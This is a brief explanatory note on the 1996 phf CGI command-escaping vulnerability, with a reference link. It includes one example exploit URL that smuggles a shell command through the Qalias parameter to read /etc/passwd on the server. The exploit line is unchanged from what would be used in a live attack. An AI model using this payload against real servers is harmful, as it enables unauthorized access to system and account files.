phf vulnerability

0001-01-01

The /cgi-bin/phf vulnerability is a command escaping vulnerability dating back to 1996.

It is trivial to exploit:

hxxp://server/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd

https://insecure.org/sploits/phf-cgi.html